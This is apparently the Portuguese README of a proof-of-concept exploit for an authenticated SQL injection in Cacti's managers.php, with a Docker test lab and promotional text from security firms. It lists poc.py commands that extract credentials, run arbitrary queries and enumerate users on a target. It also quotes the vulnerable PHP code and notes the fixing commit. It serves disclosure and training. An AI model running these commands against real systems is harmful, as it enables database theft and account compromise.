Exploit de prova de conceito para CVE-2026-40083, uma injeção de SQL no Cacti managers.php permitindo que usuários autenticados extraiam bancos de dados MySQL, credenciais de usuário e hashes de senha. Inclui laboratório Docker para testes.
Um exploit de prova de conceito para CVE-2026-40083, uma vulnerabilidade de Injeção SQL no managers.php do Cacti que permite que qualquer usuário autenticado com permissões de Gerenciador SNMP leia todo o banco de dados MySQL, incluindo credenciais de usuário e hashes de senhas.
Uso:
# Verificar injeção (baseada em tempo)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin
# Extrair credenciais de um usuário específico
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1
# Extrair resultado de consulta SQL arbitrária
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"
# Enumerar todos os usuários (varredura de IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50
# Com proxy Burp
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080
No managers.php, a entrada do usuário de selected_graphs_array é desserializada via cacti_unserialize() e inserida diretamente no SQL sem sanitização:
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));
if ($selected_items != false) {
// Sem validação - inserção direta no SQL
db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}
O parâmetro selected_graphs_array aceita um array serializado em PHP. Os elementos do array são concatenados com vírgulas e injetados diretamente na cláusula IN.
POST /managers.php (action=actions, drp_action=1|2|3)
A vulnerabilidade de Injeção SQL permite que usuários autenticados com permissões de Gerenciador SNMP executem consultas arbitrárias no banco de dados. Isso possibilita a leitura de tabelas contendo dados de usuários, configurações, credenciais de dispositivos e comunidades SNMP, bem como a extração de hashes bcrypt e tokens de API, o que pode resultar em comprometimento de contas. Além disso, a falha permite a execução de comandos com atraso de tempo, potencialmente causando negação de serviço ao esgotar conexões simultâneas com o banco de dados.
7.2 Alto CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
O commit 52032e760 adiciona array_map('intval', $selected_items) antes do implode para converter todos os valores em inteiros.
docker-compose up -d --build
Aguarde aproximadamente 30 segundos para a inicialização. Acesse o Cacti em http://localhost:8088
Credenciais padrão: admin / admin
# Testar exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1
Esta ferramenta é apenas para fins educacionais e de pesquisa. Use-a apenas em sistemas que você possui ou para os quais tenha permissão explícita para testar. O autor não é responsável por qualquer uso indevido ou dano causado por este programa.
A QuimeraX Intelligence é uma plataforma avançada de EASM e Inteligência de Ameaças Cibernéticas especializada na identificação de vulnerabilidades críticas em sistemas complexos. A plataforma monitora, detecta e alerta proativamente os clientes sobre ameaças de segurança, garantindo transparência e resposta rápida a riscos potenciais. Os clientes recebem notificações imediatas e relatórios abrangentes se seus sistemas forem considerados vulneráveis, permitindo que tomem medidas de proteção. saiba mais
Hakai Security é uma empresa de segurança cibernética fundada por profissionais de segurança, comprometida com a excelência técnica. Oferecemos soluções de segurança personalizadas, incluindo testes de penetração avançados, simulações realistas de Red Team e práticas de desenvolvimento seguro para proteger proativamente os ativos de nossos clientes contra ameaças cibernéticas em evolução.
Hacking Club é a plataforma de treinamento onde você aprende segurança cibernética por meio de aulas práticas, laboratórios e desafios criados por especialistas que trabalham em nossa consultoria de segurança: diretamente do campo de batalha para o seu treinamento. Pratique a vulnerabilidade apresentada neste repositório pelo hacking club! saiba mais